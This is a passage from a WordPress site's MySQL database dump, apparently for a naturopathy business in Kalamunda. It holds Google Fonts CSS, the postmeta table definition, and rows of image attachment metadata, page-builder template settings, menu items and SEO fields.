U+518c, U+51fb, U+521b, U+5229, U+522b, U+52a9, U+5305, U+5317, U+534e, U+5355, U+5357, U+535a, U+5373, U+539f, U+53bb, U+53ca, U+53cd, U+53d6, U+53e3, U+53f0, U+5458, U+5546, U+56db, U+573a, U+578b, U+57ce, U+58f0, U+590d, U+5934, U+5973, U+5b57, U+5b8c, U+5b98, U+5bb9, U+5bfc, U+5c06, U+5c11, U+5c31, U+5c55, U+5df2, U+5e03, U+5e38, U+5e76, U+5e94, U+5efa, U+5f71, U+5f97, U+5feb, U+6001, U+603b, U+60f3, U+611f, U+6216, U+624d, U+6253, U+6295, U+6301, U+6392, U+641c, U+652f, U+653e, U+6559, U+6599, U+661f, U+671f, U+672f, U+6761, U+67e5, U+6807, U+6837, U+683c, U+6848, U+6b22, U+6b64, U+6bd4, U+6c14, U+6c34, U+6c42, U+6ca1, U+6d41, U+6d77, U+6d88, U+6e05, U+6e38, U+6e90, U+7136, U+7231, U+7531, U+767e, U+76ee, U+76f4, U+771f, U+7801, U+793a, U+79cd, U+7a0b, U+7a7a, U+7acb, U+7ae0, U+7b2c, U+7b80, U+7ba1, U+7cbe, U+7d22, U+7ea7, U+7ed3, U+7ed9, U+7edf, U+7f16, U+7f6e, U+8001, U+800c, U+8272, U+8282, U+82b1, U+8350, U+88ab, U+88c5, U+897f, U+89c1, U+89c4, U+89e3, U+8a00, U+8ba1, U+8ba4, U+8bae-8bb0, U+8bbe, U+8bc1, U+8bc4, U+8bfb, U+8d28, U+8d39, U+8d77, U+8d85, U+8def, U+8eab, U+8f66, U+8f6c, U+8f7d, U+8fd0, U+9009, U+90ae, U+90fd, U+91cc-91cd, U+91cf, U+95fb, U+9650, U+96c6, U+9891, U+98ce, U+ff1f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.118.woff2) format(\'woff2\');unicode-range: U+d, U+3e, U+5f, U+7c, U+a0, U+a9, U+4e09-4e0b, U+4e0d-4e0e, U+4e13, U+4e1a, U+4e2a, U+4e3a-4e3b, U+4e4b, U+4e86, U+4e8e, U+4ea7, U+4eba, U+4ee4-4ee5, U+4eec, U+4f1a, U+4f4d, U+4f53, U+4f5c, U+4f60, U+4fe1, U+5165, U+5168, U+516c, U+5173, U+5176, U+5185, U+51fa, U+5206, U+5230, U+5236, U+524d, U+529b, U+52a0-52a1, U+52a8, U+5316, U+533a, U+53cb, U+53d1, U+53ef, U+53f7-53f8, U+5408, U+540c-540e, U+544a, U+548c, U+54c1, U+56de, U+56fd-56fe, U+5728, U+5730, U+5907, U+5916, U+591a, U+5927, U+5929, U+597d, U+5982, U+5b50, U+5b66, U+5b89, U+5b9a, U+5b9e, U+5ba2, U+5bb6, U+5bf9, U+5c0f, U+5de5, U+5e02, U+5e73-5e74, U+5e7f, U+5ea6, U+5f00, U+5f0f, U+5f53, U+5f55, U+5fae, U+5fc3, U+6027, U+606f, U+60a8, U+60c5, U+610f, U+6210-6211, U+6237, U+6240, U+624b, U+6280, U+62a5, U+63a5, U+63a8, U+63d0, U+6536, U+6570, U+6587, U+65b9, U+65e0, U+65f6, U+660e, U+662d, U+662f, U+66f4, U+6700, U+670d, U+672c, U+673a, U+6743, U+6765, U+679c, U+682a, U+6b21, U+6b63, U+6cbb, U+6cd5, U+6ce8, U+6d3b, U+70ed, U+7247-7248, U+7269, U+7279, U+73b0, U+7406, U+751f, U+7528, U+7535, U+767b, U+76f8, U+770b, U+77e5, U+793e, U+79d1, U+7ad9, U+7b49, U+7c7b, U+7cfb, U+7ebf, U+7ecf, U+7f8e, U+8005, U+8054, U+80fd, U+81ea, U+85cf, U+884c, U+8868, U+8981, U+89c6, U+8bba, U+8bdd, U+8bf4, U+8bf7, U+8d44, U+8fc7, U+8fd8-8fd9, U+8fdb, U+901a, U+9053, U+90e8, U+91d1, U+957f, U+95e8, U+95ee, U+95f4, U+9762, U+9875, U+9898, U+9996, U+9ad8, U+ff01, U+ff08-ff09;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.119.woff2) format(\'woff2\');unicode-range: U+20-22, U+27-2a, U+2c-3b, U+3f, U+41-4d, U+4f-5d, U+61-7b, U+7d, U+ab, U+ae, U+b2, U+b7, U+bb, U+df-e5, U+e7-ea, U+ec-ed, U+f1-f4, U+f6, U+f9-fa, U+fc, U+101, U+103, U+113, U+12b, U+148, U+14d, U+16b, U+1ce, U+1d0, U+300-301, U+1ebf, U+1ec7, U+2013-2014, U+2022, U+2027, U+2039-203a, U+2122, U+3001-3002, U+3042, U+3044, U+3046, U+3048, U+304a-3055, U+3057, U+3059-305b, U+305d, U+305f-3061, U+3063-306b, U+306d-3073, U+3075-3076, U+3078-3079, U+307b, U+307e-307f, U+3081-308d, U+308f, U+3092-3093, U+30a1-30a4, U+30a6-30bb, U+30bd, U+30bf-30c1, U+30c3-30c4, U+30c6-30cb, U+30cd-30d7, U+30d9-30e1, U+30e3-30e7, U+30e9-30ed, U+30ef, U+30f3, U+30fb-30fc, U+3127, U+4e00, U+4e2d, U+65b0, U+65e5, U+6708-6709, U+70b9, U+7684, U+7f51, U+ff0c, U+ff0e, U+ff1a;}/* latin */@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1UFWaHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}\";}}}','auto-off'); /*!40000 ALTER TABLE `wpln_options` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpln_postmeta` -- DROP TABLE IF EXISTS `wpln_postmeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_postmeta` ( `meta_id` bigint unsigned NOT NULL AUTO_INCREMENT, `post_id` bigint unsigned NOT NULL DEFAULT '0', `meta_key` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL, `meta_value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci, PRIMARY KEY (`meta_id`), KEY `post_id` (`post_id`), KEY `meta_key` (`meta_key`(191)) ) ENGINE=MyISAM AUTO_INCREMENT=34257 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_postmeta` -- LOCK TABLES `wpln_postmeta` WRITE; /*!40000 ALTER TABLE `wpln_postmeta` DISABLE KEYS */; INSERT INTO `wpln_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (1,2,'_wp_page_template','default'),(2,3,'_wp_page_template','default'),(145,41,'_wp_attached_file','2021/04/Standard-01.jpg'),(146,41,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1890;s:6:\"height\";i:1890;s:4:\"file\";s:23:\"2021/04/Standard-01.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Standard-01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Standard-01-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Standard-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Standard-01-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:25:\"Standard-01-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"clearwork-small\";a:4:{s:4:\"file\";s:23:\"Standard-01-200x200.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"clearwork-medium\";a:4:{s:4:\"file\";s:23:\"Standard-01-520x293.jpg\";s:5:\"width\";i:520;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"clearwork-large\";a:4:{s:4:\"file\";s:23:\"Standard-01-940x940.jpg\";s:5:\"width\";i:940;s:6:\"height\";i:940;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"clearwork-thumb\";a:4:{s:4:\"file\";s:23:\"Standard-01-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"alx-small\";a:4:{s:4:\"file\";s:23:\"Standard-01-200x200.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"alx-medium\";a:4:{s:4:\"file\";s:23:\"Standard-01-520x293.jpg\";s:5:\"width\";i:520;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(147,42,'_wp_attached_file','2021/04/cropped-Standard-01.jpg'),(148,42,'_wp_attachment_context','custom-logo'),(149,42,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1890;s:6:\"height\";i:1128;s:4:\"file\";s:31:\"2021/04/cropped-Standard-01.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"cropped-Standard-01-300x179.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:179;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"cropped-Standard-01-1024x611.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:611;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"cropped-Standard-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"cropped-Standard-01-768x458.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:458;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"cropped-Standard-01-1536x917.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:917;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"clearwork-small\";a:4:{s:4:\"file\";s:31:\"cropped-Standard-01-200x200.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"clearwork-medium\";a:4:{s:4:\"file\";s:31:\"cropped-Standard-01-520x293.jpg\";s:5:\"width\";i:520;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"clearwork-large\";a:4:{s:4:\"file\";s:31:\"cropped-Standard-01-940x561.jpg\";s:5:\"width\";i:940;s:6:\"height\";i:561;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"clearwork-thumb\";a:4:{s:4:\"file\";s:31:\"cropped-Standard-01-400x239.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:239;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"alx-small\";a:4:{s:4:\"file\";s:31:\"cropped-Standard-01-200x200.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"alx-medium\";a:4:{s:4:\"file\";s:31:\"cropped-Standard-01-520x293.jpg\";s:5:\"width\";i:520;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(150,42,'_wp_attachment_custom_header_last_used_polite-blog','1619786549'),(151,42,'_wp_attachment_is_custom_header','polite-blog'),(154,44,'_wp_attached_file','2021/04/cropped-Standard-01-1.jpg'),(155,44,'_wp_attachment_context','custom-logo'),(156,44,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1890;s:6:\"height\";i:1890;s:4:\"file\";s:33:\"2021/04/cropped-Standard-01-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"cropped-Standard-01-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:35:\"cropped-Standard-01-1-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"clearwork-small\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-1-200x200.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"clearwork-medium\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-1-520x293.jpg\";s:5:\"width\";i:520;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"clearwork-large\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-1-940x940.jpg\";s:5:\"width\";i:940;s:6:\"height\";i:940;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"clearwork-thumb\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"alx-small\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-1-200x200.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"alx-medium\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-1-520x293.jpg\";s:5:\"width\";i:520;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(159,46,'_wp_attached_file','2021/04/header.png'),(160,46,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:450;s:4:\"file\";s:18:\"2021/04/header.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"header-300x70.png\";s:5:\"width\";i:300;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"header-1024x240.png\";s:5:\"width\";i:1024;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"header-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"header-768x180.png\";s:5:\"width\";i:768;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:19:\"header-1536x360.png\";s:5:\"width\";i:1536;s:6:\"height\";i:360;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"clearwork-small\";a:4:{s:4:\"file\";s:18:\"header-200x200.png\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"clearwork-medium\";a:4:{s:4:\"file\";s:18:\"header-520x293.png\";s:5:\"width\";i:520;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"clearwork-large\";a:4:{s:4:\"file\";s:18:\"header-940x220.png\";s:5:\"width\";i:940;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"clearwork-thumb\";a:4:{s:4:\"file\";s:17:\"header-400x94.png\";s:5:\"width\";i:400;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"alx-small\";a:4:{s:4:\"file\";s:18:\"header-200x200.png\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"alx-medium\";a:4:{s:4:\"file\";s:18:\"header-520x293.png\";s:5:\"width\";i:520;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(161,46,'_wp_attachment_custom_header_last_used_polite-blog','1619788187'),(162,46,'_wp_attachment_is_custom_header','polite-blog'),(700,424,'_et_pb_ab_subjects',''),(166,48,'_customize_changeset_uuid','e820f4f1-070b-41d0-910e-e87eeb51ac1c'),(471,205,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:33:\"2021/04/cropped-Standard-01-2.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-2-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-2-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-2-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-2-400x512.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-2-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-2-270x270.jpg\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-2-192x192.jpg\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:33:\"cropped-Standard-01-2-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:31:\"cropped-Standard-01-2-32x32.jpg\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(470,205,'_wp_attachment_context','site-icon'),(701,424,'_et_pb_enable_shortcode_tracking','off'),(702,424,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"424\" /]'),(313,98,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:720;s:6:\"height\";i:1280;s:4:\"file\";s:16:\"2021/05/1-01.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"1-01-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"1-01-576x1024.jpg\";s:5:\"width\";i:576;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"1-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:16:\"1-01-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:16:\"1-01-720x675.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:16:\"1-01-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:16:\"1-01-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:16:\"1-01-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:16:\"1-01-480x853.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:853;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1620473034\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:4:\"Icon\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(39,16,'pagelayer-data','1619784305'),(40,16,'pagelayer_template_type','single'),(41,16,'pagelayer_template_conditions','a:2:{i:0;a:4:{s:4:\"type\";s:7:\"include\";s:8:\"template\";s:8:\"singular\";s:12:\"sub_template\";s:4:\"post\";s:2:\"id\";s:0:\"\";}i:1;a:4:{s:4:\"type\";s:7:\"include\";s:8:\"template\";s:8:\"singular\";s:12:\"sub_template\";s:10:\"attachment\";s:2:\"id\";s:0:\"\";}}'),(42,16,'pagelayer_imported_content','tripo'),(43,17,'pagelayer-data','1619784305'),(44,17,'pagelayer_template_type','footer'),(45,17,'pagelayer_template_conditions','a:1:{i:0;a:4:{s:4:\"type\";s:7:\"include\";s:8:\"template\";s:0:\"\";s:12:\"sub_template\";N;s:2:\"id\";s:0:\"\";}}'),(46,17,'pagelayer_imported_content','tripo'),(47,18,'pagelayer-data','1619784305'),(48,18,'pagelayer_template_type','header'),(49,18,'pagelayer_template_conditions','a:1:{i:0;a:4:{s:4:\"type\";s:7:\"include\";s:8:\"template\";s:8:\"singular\";s:12:\"sub_template\";s:10:\"front_page\";s:2:\"id\";s:0:\"\";}}'),(50,18,'pagelayer_imported_content','tripo'),(51,19,'pagelayer-data','1619784305'),(52,19,'pagelayer_template_type','header'),(53,19,'pagelayer_template_conditions','a:1:{i:0;a:4:{s:4:\"type\";s:7:\"include\";s:8:\"template\";s:0:\"\";s:12:\"sub_template\";s:0:\"\";s:2:\"id\";s:0:\"\";}}'),(54,19,'pagelayer_imported_content','tripo'),(55,20,'pagelayer-data','1619784305'),(56,20,'pagelayer_template_type','archive'),(57,20,'pagelayer_template_conditions','a:1:{i:0;a:4:{s:4:\"type\";s:7:\"include\";s:8:\"template\";s:8:\"archives\";s:12:\"sub_template\";s:0:\"\";s:2:\"id\";s:0:\"\";}}'),(58,20,'pagelayer_imported_content','tripo'),(90,25,'pagelayer-data','1619784306'),(91,25,'pagelayer_imported_content','tripo'),(92,26,'pagelayer-data','1619784306'),(93,26,'pagelayer_imported_content','tripo'),(94,26,'pagelayer_contact_templates','s:66:\"s:58:\"a:1:{s:7:\"pe25980\";a:1:{s:13:\"cont_use_html\";s:4:\"true\";}}\";\";'),(95,27,'pagelayer-data','1619784306'),(96,27,'pagelayer_imported_content','tripo'),(97,28,'pagelayer-data','1619784306'),(98,28,'pagelayer_imported_content','tripo'),(99,29,'_menu_item_type','post_type'),(100,29,'_menu_item_menu_item_parent','0'),(101,29,'_menu_item_object_id','28'),(102,29,'_menu_item_object','page'),(103,29,'_menu_item_target',''),(104,29,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(105,29,'_menu_item_xfn',''),(106,29,'_menu_item_url',''),(107,30,'_menu_item_type','post_type'),(108,30,'_menu_item_menu_item_parent','0'),(109,30,'_menu_item_object_id','27'),(110,30,'_menu_item_object','page'),(111,30,'_menu_item_target',''),(112,30,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(113,30,'_menu_item_xfn',''),(114,30,'_menu_item_url',''),(711,433,'footnotes',''),(685,424,'_wp_page_template',''),(698,424,'_et_pb_built_for_post_type','page'),(311,97,'_wp_attached_file','2021/05/5-01.jpg'),(312,98,'_wp_attached_file','2021/05/1-01.jpg'),(600,28,'_aioseo_title','Verde Naturopathy'),(601,28,'_aioseo_description','Kalamunda Naturopath providing holistic healing and herbal 